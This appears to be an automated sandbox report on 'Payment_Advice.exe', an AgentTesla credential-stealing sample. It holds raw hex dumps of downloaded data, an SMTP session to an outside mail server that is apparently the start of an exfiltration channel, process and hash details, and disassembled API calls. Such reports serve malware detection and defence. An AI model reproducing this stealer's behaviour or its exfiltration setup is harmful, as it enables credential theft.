a6 e4 bb b2 92 bd 64 cf 84 3e 0a 3a 5a f2 ae 0e 6b 31 30 59 86 54 61 81 d7 c1 c2 c1 49 55 ad f7 69 44 cf b2 62 51 06 01 1b 8b ef e8 c4 06 ff 07 71 11 65 71 0a 00 7c a0 7a c9 57 26 1c
                                                                    Data Ascii: D2?{$DVt:Z$t9GB#O!g6^Hd)(}<>]a1S}%8Sy uzW!QbP$o[>:AbG&>D@>r\{}d>:Zk10YTaIUiDbQqeq|zW&
                                                                    2021-09-27 12:27:48 UTC203INData Raw: c6 22 b7 99 99 5d f4 ca 81 60 74 03 b8 50 7e e7 09 0a 5c 30 ee 35 bf 1f aa 2b b7 00 18 11 33 d2 df a6 e7 24 cf fc ba 41 7d 32 b5 1b cd 6f ee dc 46 87 16 90 a7 67 01 16 76 d3 7a 87 e9 91 75 7e 97 21 3c ee 3a 66 58 bb ca 20 7c 75 07 c5 b2 46 f6 c4 69 ed 7f 00 04 a2 63 7f 0a 79 e3 09 90 86 96 74 af 57 58 3c 7f d7 60 a1 e7 56 fb 61 ae c4 d0 eb 5b f7 d9 1e 1a de d1 51 52 3d 8e 56 6f 9b 54 52 db c2 30 08 ef 68 96 ef ef de 6c 3c 83 1f 4a 32 13 f1 3f 12 2a 35 bb 28 11 63 3f c2 c3 b7 fd c2 1b 5f cd fd 5e c9 1b 1a a6 67 8a b3 c8 00 34 63 54 76 fa 29 c3 bd a7 37 eb c8 c5 6c e8 f4 aa da 30 2f 74 8f 64 57 d4 1a 0f 58 24 6b 7d 46 b1 1f bc 50 d7 4e 27 c8 e3 46 de 35 2d 95 6b 31 9d 87 f0 bf 3c 15 83 2b fe 83 46 5d 0e 45 07 d9 bb c5 b2 e8 92 e1 2f f7 a6 9f 02 e9 d3 07 da
                                                                    Data Ascii: "]`tP~\05+3$A}2oFgvzu~!<:fX |uFicytWX<`Va[QR=VoTR0hl<J2?*5(c?_^g4cTv)7l0/tdWX$k}FPN'F5-k1<+F]E/
                                                                    2021-09-27 12:27:48 UTC204INData Raw: 8c 18 0a 3b 83 fa 46 16 60 47 cf 85 02 74 d2 bc 1d 85 ac a6 f3 25 7c 2c f6 b7 fd e4 5b 7d 50 74 71 b8 28 50 ea 2c 07 7d 26 08 19 25 31 f7 fa 0b ea 8c 57 6e f0 f0 3b 95 24 b8 33 bb f5 20 d4 4e 81 f5 20 73 62 a9 25 f7 ee 37 cd 95 76 8c c3 d0 a1 63 12 96 d5 3b 5b 23 47 93 82 25 e5 d2 f0 24 aa ea 4f eb c5 5d 74 bb 1d 9f 69 ac ef 2b 53 58 d4 e2 6c 37 ef 04 0f c0 31 1c b6 2a 69 d3 18 99 69 e0 1e f2 46 32 53 37 bd 32 95 79 e4 b7 2c 00 ea 7d 12 31 e8 db 8d 35 f1 d1 5e 83 8a 12 88 3a 18 42 55 56 2c 92 44 17 fd 07 48 8e 1f 0c 96 8a 85 03 29 b4 ce 60 b6 4e d5 40 56 8b c7 dd 8c 0f 42 80 eb 72 c9 36 34 83 42 69 ad f1 0a 4b 93 23 bb 92 06 c1 6a 65 02 8a db 9b 12 7a 5a 68 bc 4b 7f 1a 8d ab 31 59 0b 1b 31 4c 13 f9 20 14 4e a9 9f fa 80 98 39 9d 81 c6 72 9e 7a d2 6c de a0
                                                                    Data Ascii: ;F`Gt%|,[}Ptq(P,}&%1Wn;$3 N sb%7vc;[#G%$O]ti+SXl71*iiF2S72y,}15^:BUV,DH)`N@VBr64BiK#jezZhK1Y1L N9rzl
                                                                    2021-09-27 12:27:48 UTC205INData Raw: 83 0a c2 21 a5 00 7c ba 77 72 33 29 eb 54 f2 c6 d5 d4 90 f7 19 4d 1a a4 df a1 2c a1 a1 30 54 c7 54 9a 1b ea aa f2 03 44 be e5 a5 ac 85 ff 8a 4d 2f 22 00 81 a1 c9 5a bf ac 42 d4 14 89 cd 21 af 49 f9 4f a8 b4 e0 4b 23 fd 45 29 6c fc 4c 2b 40 87 37 f5 b8 06 f3 10 05 02 5f 0c 54 72 db 84 3c 51 74 83 46 15 cc 70 fa 4a d8 ca 2a f5 af d4 6e 95 3f e4 60 07 17 16 d3 23 51 c6 86 05 6a 64 28 61 25 97 c4 eb 65 fd 48 06 ac b6 2b c5 b8 0b 54 8f 13 0c 41 9d 96 78 8c 2d fa c1 bc c9 04 27 84 a0 09 cb ef ea 83 5f 60 f7 2f e1 d4 5c a8 34 31 18 9e 74 af 2e e6 c0 87 9a e9 58 19 96 57 c5 8c 79 9b fd d2 13 c1 e2 a1 ed a5 a6 07 e0 84 23 79 5d 78 e3 85 1e 7d 31 27 59 86 20 72 9c c8 db e1 c0 55 38 b7 c4 5a 45 ce ae 07 45 10 75 23 bb e8 d2 f7 36 f4 1e 71 0c 16 02 1c 11 57 aa 48 c8
                                                                    Data Ascii: !|wr3)TM,0TTDM/"ZB!IOK#E)lL+@7_Tr<QtFpJ*n?`#Qjd(a%eH+TAx-'_`/\41t.XWy#y]x}1'Y rU8ZEEu#6qWH
                                                                    2021-09-27 12:27:48 UTC207INData Raw: 2b 90 99 ce 2a b3 a7 bf 5d e4 ce ac 0f 53 18 a2 50 5e e7 09 16 77 25 ee 1a 9b 0f bd 1b d8 32 18 75 15 d4 c8 9c c4 38 a6 d8 ab 6d 71 25 b0 17 d9 64 9e cf 23 b1 0a a3 b2 63 3e 37 6a f4 67 89 f7 e5 26 53 b7 38 20 ea 1d 4b 43 ac dc 36 7b 6f 07 d3 b5 34 d0 ca 0d fa 64 61 33 b9 63 7a 0a 17 d2 03 e2 ba f9 13 89 4c 6a 1c 71 d7 71 f5 fb 33 cc 51 8e d2 f6 f0 5b f1 d3 6a 27 f8 bf 46 58 4f 84 58 03 ad 5e 20 ca c2 36 07 c9 74 84 80 9c f2 75 02 ad 14 7d 38 05 fa 3d 37 17 36 a6 5e 32 78 0a c1 d5 8a 93 f7 1b 2d ff 94 55 c9 26 2b b0 67 f8 84 bd 1f 25 62 79 63 dc 35 d1 d2 e1 05 f2 f3 c5 58 df e3 a8 c6 3a 32 49 e1 4a 4c a0 2d 3d 49 10 5c 6a 44 ad 15 a1 6d b9 70 25 a4 fe 4c c8 39 00 90 71 3f fc 94 fc a4 0d 14 82 3e e5 83 46 5d 08 73 2e da a1 cb d3 d5 b8 fc 24 da ad 97 19 80
                                                                    Data Ascii: +*]SP^w%2u8mq%d#c>7jg&S8 KC6{o4da3czLjqq3Q[j'FXOX^ 6tu}8=76^2x-U&+g%byc5X:2IJL-=I\jDmp%L9q?>F]s.$
                                                                    2021-09-27 12:27:48 UTC208INData Raw: 8f 7b f1 8e 1c 0c 34 a3 f0 4b 1a 70 47 f8 8e 70 7c c5 c8 11 a3 b9 86 e0 29 7f 3d ec c3 e9 e3 48 7e 4b 00 5b d7 24 4b d0 1d 33 7a 35 0b 02 51 2f 92 e1 24 fb b0 54 69 e4 f7 1e 9c 2e a5 27 da fe 16 c5 61 90 f5 28 68 7f b2 51 c7 ab 2a dd 8c 4c 8e d0 cd a1 63 7b af cd 55 69 3d 51 8a 82 26 bf ce f7 2d ba fb 52 da d2 28 50 ad 21 8b 71 af d2 59 51 50 d0 d3 7b 42 c0 22 0f d8 35 07 83 4f 5c e0 1e 9f 6f e4 18 e9 4d 32 3f 17 bb 24 97 0d 99 b1 3b 24 f7 60 62 19 f5 c1 9d 41 ed c6 2a 9f a8 05 86 36 04 06 79 62 3b 89 64 11 fd 0d 31 cd 2e 05 9e 8e 82 29 26 a5 d8 49 b4 55 c2 4b 56 9f cb d0 8d 15 55 87 cf 63 d6 66 0f 82 69 64 df b6 22 56 a7 02 a0 87 0b 92 4c 72 65 84 cd 9b 3f 4b 65 6f a1 33 44 69 cf 92 42 1a 35 68 75 73 60 bc 1c 67 08 94 ec bd b2 eb 71 86 f2 a7 6a ed 18 ef
                                                                    Data Ascii: {4KpGp|)=H~K[$K3z5Q/$Ti.'a(hQ*Lc{Ui=Q&-R(P!qYQP{B"5O\oM2?$;$`bA*6yb;d1.)&IUKVUcfid"VLre?Keo3DiB5hus`gqj
                                                                    2021-09-27 12:27:48 UTC209INData Raw: 7a 74 62 70 c7 b7 c4 00 4d bf 07 0b 05 52 a9 5d 39 9a 8d be 95 e2 8e 13 2a 7c d1 98 dd cd 33 d5 f5 c3 a0 3b ff 76 84 de d2 53 35 d0 94 c8 c9 ac 8b e0 21 57 55 7b 89 f6 bc 36 ca cb 21 b4 5b ee b3 0c c2 3e 8a 4e dd b4 9a 07 45 90 3d 5a 83 9e 27 5d 91 e3 4b 9a db 71 06 7c 65 f0 4e 7a 11 06 96 64 55 22 35 ed 37 f1 b9 25 bb 38 ab 26 5a 85 ea a7 01 9b 79 aa 03 6a 70 53 a1 78 34 b4 e6 65 13 14 4d 12 5b 9a 8e 9b 02 82 24 7a c7 c4 59 cb f8 6f 3a ef 7a 78 04 f7 ff 0b c7 4f 86 a0 aa db 22 5a 83 cc 7d ad e3 81 ed 3e 1e d1 46 8c a5 20 c8 34 70 71 f3 15 d1 48 2b 80 e6 68 cc 16 78 fc 32 84 f2 08 7f ab a4 33 a6 96 54 9b ff d3 66 81 f0 d1 23 4c be af f9 5d 09 51 d4 19 fa d5 0f ea a0 ba 8a bd 20 38 fc 89 15 2f a4 db 62 32 6d 7b 4a d0 94 81 b1 56 82 ed 21 62 60 13 ee 4d 3e
                                                                    Data Ascii: ztbpMR]9*|3;vS5!WU{6![>NE=Z']Kq|eNzdU"57%8&ZyjpSx4eM[$zYo:zxO"Z}>F 4pqH+hx23Tf#L]Q 8/b2m{JV!b`M>
                                                                    2021-09-27 12:27:48 UTC210INData Raw: f1 47 18 a7 28 59 d8 b1 22 b9 4e cd 74 03 55 fc e6 8b 51 df 5d f3 4d 11 23 32 7b 72 39 74 34 4b be c6 8e 7a ca 42 b0 c6 fb 63 e7 8c 7d a5 18 e4 7d 7e fe 18 24 d9 c4 4d be 4b 17 12 c1 69 a2 24 94 04 f9 b6 ec 8a 1b 18 16 c2 ff de 24 d4 ad 67 53 b6 52 ec 17 8a b0 e0 39 2f a4 9f ce cf a5 a5 ed 2e 58 39 61 e8 e1 d5 26 a2 d7 46 a3 35 fe c8 43 a3 29 e3 5d a6 c3 fd 06 2b 8b 5a 5a 6b 8d 40 5d 79 f4 2c 86 bc 71 ee 67 1e 63 36 6d 58 14 ed f7 31 35 7c ff 4c 62 c1 32 f2 2a d0 b5 26 93 a3 b4 9c d5 68 e3 11 01 61 2e b3 f2 91 a9 e9 7d 1e 91 e8 12 44 16 cb 8a 81 b6 21 67 d1 45 c1 c4 e7 eb 7a e8 74 68 22 e9 79 a5 c9 54 89 33 56 c8 49 45 ff d6 e1 26 87 90 ff bf 48 b7 4e 82 a6 35 cf 43 ff 3e f7 1f c2 58 a3 85 f7 e8 fa 1e 63 fb 21 86 ea 3a ff 8f b2 13 ac 8d d4 a7 e4 52 20 80
                                                                    Data Ascii: G(Y"NtUQ]M#2{r9t4KzBc}}~$MKi$$gSR9/.X9a&F5C)]+ZZk@]y,qgc6mX15|Lb2*&ha.}D!gEzth"yT3VIE&HN5C>Xc!:R
                                                                    2021-09-27 12:27:48 UTC211INData Raw: e2 77 9c 10 0a 07 ff 3c f2 50 37 28 18 d3 4e 2f eb 98 f5 47 57 5d 01 36 29 62 f8 75 67 5d ef e1 fa ca fe 2b 7e fb c4 1e e3 67 90 03 ba d9 e7 f4 45 51 4f f9 9c a1 47 c1 f8 e9 3e 9a a0 e7 6c 26 73 d7 42 9b 87 77 47 9d 41 96 53 f2 7a d2 72 dd 6a 73 0d 53 a7 b7 e5 a6 cc 32 86 d2 16 09 ca d8 69 bf 1d f3 be 3e ef 54 cd d6 11 56 6e 13 9f 13 f0 86 80 a7 28 fa 4c 59 9b 7b 8e b9 c1 a4 4f 08 19 1a 82 d5 56 a4 2b f5 b8 10 08 49 dd 6d 29 6b 71 b4 6e 80 c6 e9 7c fc 36 3d 47 19 ad 0b fd 9a 3f b6 00 d6 b5 8a 8d 5c 93 a4 9e a1 bf d9 3a 35 38 ea 38 7d 97 33 55 bb a4 4a 4a a8 1b fe 8a ef 93 1c 53 ea 74 01 4c f5 d9 51 5c 4c 5d c8 35 4b 17 46 b3 a5 f6 9b ac 71 5f 89 88 3c a2 5b 73 c4 06 97 fe af 05 5d 15 23 33 b3 55 27 83 a0 51 80 aa ae 28 0c f3 df 93 5e 5c 33 fc 01 32 d4 5e
                                                                    Data Ascii: w<P7(N/GW]6)bug]+~gEQOG>l&sBwGASzrjsS2i>TVn(LY{OV+Im)kqn|6=G?\:588}3UJJStLQ\L]5KFq_<[s]#3U'Q(^\32^
                                                                    2021-09-27 12:27:48 UTC212INData Raw: 2d ef f9 40 0d 51 d4 7c fa 3d 2a f3 a9 b0 8e b3 25 29 7c 5d 07 30 28 11 7e 33 43 75 56 5e 0d 80 b6 51 85 7e 95 e6 64 10 ee 34 2d fb 07 a0 49 72 1c c4 9a 02 98 e9 17 78 18 f1 87 2b 7b 0d 2e 8f ea 75 07 b2 3e fb fd dd e4 e8 58 97 e8 92 e3 ba 97 27 03 a0 a5 29 d7 48 26 8a 45 47 12 51 76 e9 fc 45 95 87 5a b9 fc 27 09 88 87 63 ed 42 c3 de 66 8b 1a ac 3b e7 87 43 09 10 de 38 bb b8 5e be ed 01 7f 3b a5 c0 04 00 5a 2d 54 34 4a 2a e3 e9 43 98 9d 93 5b dd 08 a2 af a5 26 99 5e 44 fe 30 c3 ad 2b 25 3d 92 a7 31 42 b6 61 48 a1 73 73 f3 2a 10 b0 55 f0 5e 81 28 9d 77 32 39 54 8c 5d a1 79 8d d4 07 74 cc 0f 58 7c cc b5 a8 41 d3 a3 10 c0 b7 77 b9 4e 2c 06 62 35 0d eb 60 63 c7 75 1e cd 3a 69 af fe b9 46 1d d7 dd 19 a4 3a d9 32 32 d9 c7 bc 8e 46 4b f4 d3 06 d2 36 17 ed 7a 1d
                                                                    Data Ascii: -@Q|=*%)|]0(~3CuV^Q~d4-Irx+{.u>X')H&EGQvEZ'cBf;C8^;Z-T4J*C[&^D0+%=1BaHss*U^(w29T]ytX|AwN,b5`cu:iF:22FK6z
                                                                    2021-09-27 12:27:48 UTC214INData Raw: 01 3b c9 f2 9f 1f b9 2b 46 c6 b8 2b a8 5c 4d fa 0a 4f fc f2 97 d3 5a 5c e9 4c 81 8d 3d 30 72 24 61 b3 da b1 dd 94 f3 86 56 b9 c3 ec 7f 68 09 69 b9 84 73 61 7e fe 04 b8 4a d9 42 31 da 0b 0e 48 2d ac 31 9b 8b 9a b2 e9 91 0b 8b e6 d1 84 4d 0d d3 d6 f4 a3 a5 29 7f 3e 96 cb 71 41 2f 4e 84 d2 42 b2 b9 62 60 58 39 7b 9c fd ae b5 6a c0 0f b1 4e 6f b4 57 ea 3a 98 cc d6 d9 92 34 43 8b b0 55 0c b6 2e 40 05 f4 c4 0d d4 71 06 35 62 63 de e6 30 14 05 a5 4a 4a 08 e3 37 19 a6 32 f6 25 bc ba 4a 8f d8 27 5d 9b 68 e3 0b 75 7d 7a b1 72 32 b5 f7 75 11 10 45 10 5c 96 8e 97 07 87 27 7c cd d9 56 cb fd 77 34 e6 7e 6e 2a e5 f6 02 c1 49 86 bc c7 eb 40 43 ff d6 e1 26 87 97 6c 7e 19 a6 c1 15 a5 2f 5b 11 63 74 fa 0d c2 48 2b e5 e6 80 e1 03 7e e8 b3 25 cd 1d f3 9b b3 92 3f 86 c7 33 b6
                                                                    Data Ascii: ;+F+\MOZ\L=0r$aVhisa~JB1H-1M)>qA/NBb`X9{jNoW:4CU.@q5bc0JJ72%J']hu}zr2uE\'|Vw4~n*I@C&l~/[ctH+~%?3
                                                                    2021-09-27 12:27:48 UTC215INData Raw: 46 72 c1 ea 60 10 17 15 0c e3 ab fe cf 83 37 13 c0 42 3a 6c 83 fa c3 c4 47 60 39 0f 40 f8 74 e6 d3 ed e6 fd ce e3 24 f9 ef c3 1e e5 72 93 1e bd d6 fd f4 50 1d 42 f3 8c bb ce 5e f9 f9 b5 c7 b0 fd e1 bf 77 c4 d1 59 97 6f d4 86 45 89 4b 75 3e d0 61 d6 79 63 03 d5 2e aa ec a6 cd e2 99 c0 04 16 43 ec 71 a6 13 83 a7 31 72 09 d9 d6 1d 56 7d 13 8a 10 ec 95 10 66 19 fc 42 44 94 74 12 20 da bc ce 92 1a 12 95 5c 02 b6 a5 67 a7 18 15 53 4c 27 3a 6b 77 aa 75 97 c7 eb f6 d9 36 27 cf 23 b8 00 e8 8d 4b bd 06 c3 b8 8c 8e 7b 93 be 03 7d b9 d9 2f 38 35 e2 3e 6b f0 29 2b b2 b5 2d 51 a6 07 e2 f9 f2 92 09 5d e6 68 70 41 65 17 19 55 43 56 ca 28 45 8b 6f bc 24 b3 81 cd 6a 5f 8d b4 33 ad 40 f7 91 0e aa f1 a1 7e c0 c3 21 03 b2 46 bb d2 ba 74 a5 a3 b0 2f 9f 07 40 b2 4d c0 7d ef 0c
                                                                    Data Ascii: Fr`7B:lG`9@t$rPB^wYoEKu>ayc.Cq1rV}fBDt \gSL':kwu6'#K{}/85>k)+-Q]hpAeUCV(Eo$j_3@~!Ft/@M}
                                                                    2021-09-27 12:27:48 UTC216INData Raw: d3 8b 56 3f 84 e3 df 0d 51 d7 39 fa d6 27 ea ba a9 04 1f 22 38 ff 9f 07 38 ad c8 60 3d 7f 7d 4c c3 8d 0d 12 5a 8c 66 08 75 6f 1e 67 73 24 fd 01 a4 2d 76 6e d5 7d aa f5 f4 68 f8 cf f5 95 2d 7d 08 37 aa f6 72 10 b4 bb 43 fd c4 fe 83 42 1e 55 9d de bb 9e 34 0e 3f 68 3f d5 43 3c 88 5d 4a 01 5c 6f 63 20 76 90 80 5c aa f3 3d 0a 89 9f 71 ed 49 d9 56 d2 90 74 b2 23 e5 9a 44 15 8d 2a 0f b9 bc 4c aa 79 8a ff b0 25 8e 09 1c c7 a6 38 32 4a 3f fb f5 ca d1 95 80 23 dd 09 8f a0 b6 2d 11 d6 7d 97 15 de 93 23 1c 35 a8 a2 22 40 83 79 7f aa 45 76 cc 32 26 b8 64 e0 0d 01 de 94 14 30 7c 45 4a cc f6 fa 5f d8 4e 74 86 0f 12 7c 86 b5 e4 41 9e a3 52 c1 f8 74 e9 4e 7d 04 30 35 5e eb 34 6d 92 73 40 df ed dd f9 f6 f0 4e 5a d2 ac 11 d0 3d b7 23 d7 ed bf b9 f0 5e 34 e9 be 04 b9 34 60
                                                                    Data Ascii: V?Q9'"88`=}LZfuogs$-vn}h-}7rCBU4?h?C<]J\oc v\=qIVt#D*Ly%82J?#-}#5"@yEv2&d0|EJ_Nt|ARtN}05^4ms@NZ=#^44`
                                                                    2021-09-27 12:27:48 UTC217INData Raw: 2e 75 0e 0d 34 d6 61 53 20 be 08 4a ca a2 a3 40 52 45 d9 00 49 ee 73 75 c2 d2 89 e1 4a 97 9e 30 32 7e 3e e6 60 cf ba db 9b db 8c 4b b4 d9 7a bc e3 b0 6b b6 8b fd a9 61 73 d3 a7 41 d1 5d 35 d8 1c 07 47 2a ae 33 94 04 88 bc c2 86 1b 18 ff 3c 86 d1 48 dd c3 72 2f b6 ba 67 7f 8a 59 1e 52 33 c3 83 40 25 b9 2b 0f 35 5b d1 d6 80 e1 3c d8 c3 d0 3e 30 f9 ed b3 d1 26 34 8a 4d cd c1 86 94 a6 8c 21 c9 9b 9e 3b cf fc ee 42 91 c8 66 80 72 7e 79 5b 5f 30 0f 8d eb 5f 20 08 e8 37 f1 dd 3d 9e 3f b3 ba 4a 89 cf a6 1c 88 7f 83 06 68 72 6e a4 74 36 94 e6 69 1d 90 a1 1c 51 90 96 9e 1d 8a 3b f3 b6 d9 5d c2 e8 6f 32 ea 73 6b 25 f0 fc 2c ce 48 91 b9 c8 cc 4d 55 ef d6 e1 ca 9b 80 e5 3b 0c b5 5d 89 ae 38 fa 53 7f 70 fe 1f cb 53 b7 a0 fc fb 69 cb 7a f0 3b 8d e6 12 f4 ae a3 12 b6 95
                                                                    Data Ascii: .u4aS J@REIsuJ02~>`KzkasA]5G*3<Hr/gYR3@%+5[<>0&4M!;Bfr~y[_0_ 7=?Jhrnt6iQ;]o2sk%,HMU;]8SpSiz;
                                                                    2021-09-27 12:27:48 UTC219INData Raw: e3 c3 23 f2 70 cf ed f6 93 18 10 00 f0 bb fd 24 38 15 1e d3 4e 20 6c 90 ed 5f 5c 45 6f 37 14 65 e4 63 69 46 e6 e4 f0 c8 e8 3c f2 e3 42 15 ff fe 9c 15 b8 d6 ee e3 d9 c9 40 ec 84 ac 47 cf ff e8 29 82 b8 ea 72 4f 7e d1 53 04 87 6f d1 12 4c 94 5e f7 67 d6 7d 5a 66 7e 08 53 bb b6 fc a9 49 bb 9f d3 0f 05 4e ec 71 a7 04 f3 be 3e f6 54 d4 c3 01 23 7f 0f 93 08 f5 9a 94 3b 14 e9 4f 44 9f 7b 09 2a d2 ab 52 0e 06 02 9a d8 54 34 bb 7b 2d 01 12 28 c3 63 3c 78 7c b9 63 8d cb e4 71 f1 3d 28 49 4b a2 23 e8 8d 4b bd 13 db a1 96 05 5b 8b b3 03 7d ad c3 b2 9d 2f 6a 99 7d 7f 33 4e a0 bb 58 4b ba 1a e2 e9 fd 16 01 4f 64 86 15 4f f6 9c 41 5e 56 d2 dc 3a d6 02 54 b3 a2 e2 81 cd 69 43 96 88 2f b0 4f 68 dd 14 97 ec a0 6e 55 07 a7 b6 b2 52 b4 51 5a 73 8c aa ac 2f 9c 07 7c b2 4a 50
                                                                    Data Ascii: #p$8N l_\Eo7eciF<B@G)rO~SoL^g}Zf~SINq>T#;OD{*RT4{-(c<x|cq=(IK#K[}/j}3NXKOdOA^V:TiC/OhnURQZs/|JP
                                                                    2021-09-27 12:27:48 UTC220INData Raw: 64 83 61 50 0a 5d 3f 86 f1 5d 08 43 55 3c e8 54 22 ef a7 b8 84 b3 26 b8 fe 94 1b 21 aa dc 62 36 63 75 44 de 9c 8d b6 52 90 6d 14 7f 65 02 6f e4 23 f5 09 0c a5 71 73 00 ff 02 f1 e9 79 78 6b f1 95 2c 73 6b b0 89 f7 9a 1a a0 bc 4e e0 d8 f6 81 4a 16 49 51 c1 8c 96 29 12 74 74 71 d7 14 3b d9 58 07 0f 06 67 38 25 1f 92 c1 54 ea f9 65 0c dc 82 31 f0 01 d1 11 da 99 73 b1 3e 5d 83 ae f9 0d db 24 be ab 59 b8 f8 13 fe a2 a4 ce 11 12 db b4 55 3a 44 1d fe e7 4b 91 9d 92 4e cb 89 3b ae aa 28 19 de 6f fe 1d c3 9d 2b 14 3d a0 a7 02 42 c6 61 7d a1 44 73 92 2a 49 b0 1e f0 59 81 03 9d 58 32 18 54 80 5d 89 79 ac d4 20 74 85 0f 12 7c a3 b5 e0 41 9e a3 0a c0 8a 77 88 4e 13 06 43 35 32 eb 55 63 e6 75 21 cd 02 69 99 fe e0 46 47 d7 bc 19 76 3e 9e 30 56 d9 a3 bc bb 46 58 f4 c9 06
                                                                    Data Ascii: daP]?]CU<T"&!b6cuDRmeo#qsyxk,skNJIQ)ttq;Xg8%Te1s>]$YU:DKN;(o+=Ba}Ds*IYX2T]y t|AwNC52Ucu!iFGv>0VFX
                                                                    2021-09-27 12:27:48 UTC221INData Raw: d4 5d 6a 2c 72 0e 0f 35 d8 70 d2 19 b9 28 48 c8 b0 23 ac 5c 4c f9 02 4b fc f3 99 d0 52 5c ed 4d 91 83 35 38 7c 2c 66 b5 d2 bf d3 9c fb 8e 41 be c8 f9 6d e9 90 68 b7 99 7d 7c 70 f0 0a a5 44 d1 5f 3f d2 16 00 40 29 ac 31 86 85 bd b5 e2 84 19 0a 7f d0 96 cc 4d c6 c4 75 3a a4 3b fe 7e 98 d9 f2 50 3d cd 91 c0 c1 ab ab e3 20 4a 50 73 81 f3 bc 34 cb c5 2f b1 5c ec a1 51 ca 3b 8a 4f cf d1 94 14 42 99 33 48 02 9f 29 4f 10 e6 45 94 d5 63 87 75 77 71 5f 7f 31 06 84 e5 58 27 65 ee 25 7c a8 20 9b 78 8f a7 4f 81 ca a6 1d 95 7a 8a 03 68 73 73 a1 73 30 b4 e7 68 0f 10 4d 13 56 97 8b 9b 00 8f 29 72 c3 c4 58 c5 f5 6a 3a ee 74 69 2c f8 f8 0c cf 41 9b b2 cf c9 47 48 ea c4 60 bf 86 85 ed 3e 0c b4 40 8c a4 3d da 51 7e 7a f4 11 cc 5a aa a5 f4 e9 e9 1e 70 fa 32 84 ef 1a fe 8e a1
                                                                    Data Ascii: ]j,r5p(H#\LKR\M58|,fAmh}|pD_?@)1Mu:;~P= JPs4/\Q;OB3H)OEcuwq_1X'e%| xOzhsss0hMV)rXj:ti,AGH`>@=Q~zZp2


                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Sep 27, 2021 14:29:24.168488026 CEST58749795188.93.227.195192.168.11.20220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Mon, 27 Sep 2021 13:29:22 +0100
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Sep 27, 2021 14:29:24.168943882 CEST49795587192.168.11.20188.93.227.195EHLO 065367
                                                                    Sep 27, 2021 14:29:24.218462944 CEST58749795188.93.227.195192.168.11.20250-iberweb-11a.ibername.com Hello 065367 [84.17.52.54]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPE_CONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    Sep 27, 2021 14:29:24.218764067 CEST49795587192.168.11.20188.93.227.195STARTTLS
                                                                    Sep 27, 2021 14:29:24.270509005 CEST58749795188.93.227.195192.168.11.20220 TLS go ahead

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: Payment_Advice.exe PID: 3432 Parent PID: 5232

                                                                    General

                                                                    Start time:14:26:57
                                                                    Start date:27/09/2021
                                                                    Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\Payment_Advice.exe'
                                                                    Imagebase:0x400000
                                                                    File size:90112 bytes
                                                                    MD5 hash:3A27F66A430A3B54D24FB8F75E837175
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Visual Basic
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: RegAsm.exe PID: 7244 Parent PID: 3432

                                                                    General

                                                                    Start time:14:27:21
                                                                    Start date:27/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\Payment_Advice.exe'
                                                                    Imagebase:0x790000
                                                                    File size:65440 bytes
                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 2548 Parent PID: 7244

                                                                    General

                                                                    Start time:14:27:21
                                                                    Start date:27/09/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6486e0000
                                                                    File size:875008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: Payment_Advice.exe PID: 3432 Parent PID: 5232 Payment_Advice.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00412B60, Relevance: 75.6, APIs: 39, Strings: 4, Instructions: 329COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #612.MSVBVM60(?), ref: 00412BE2
                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 00412BEC
                                                                      • __vbaStrMove.MSVBVM60 ref: 00412BF7
                                                                      • __vbaFreeVar.MSVBVM60 ref: 00412C00
                                                                      • #575.MSVBVM60(?,?), ref: 00412C1C
                                                                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 00412C3E
                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00412C51
                                                                      • __vbaNew2.MSVBVM60(004108BC,004145C0), ref: 00412C71
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,023A004C,004108AC,00000034,?,?,00000ACB,?), ref: 00412CBB
                                                                      • __vbaObjSet.MSVBVM60(?,?,?,?,00000ACB,?), ref: 00412CCC
                                                                      • __vbaStrToAnsi.MSVBVM60(?,snappishly,00000000), ref: 00412CDC
                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00412CEF
                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000ACB,?), ref: 00412D0E
